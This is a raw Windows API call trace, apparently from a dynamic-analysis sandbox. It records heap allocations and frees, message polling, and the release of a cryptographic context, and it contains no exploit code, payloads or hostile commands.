RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.751] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0211.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0211.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0211.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0211.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0211.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0211.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0211.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0211.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0211.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.755] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0211.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0211.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.756] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.757] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.757] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0211.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.760] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.760] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 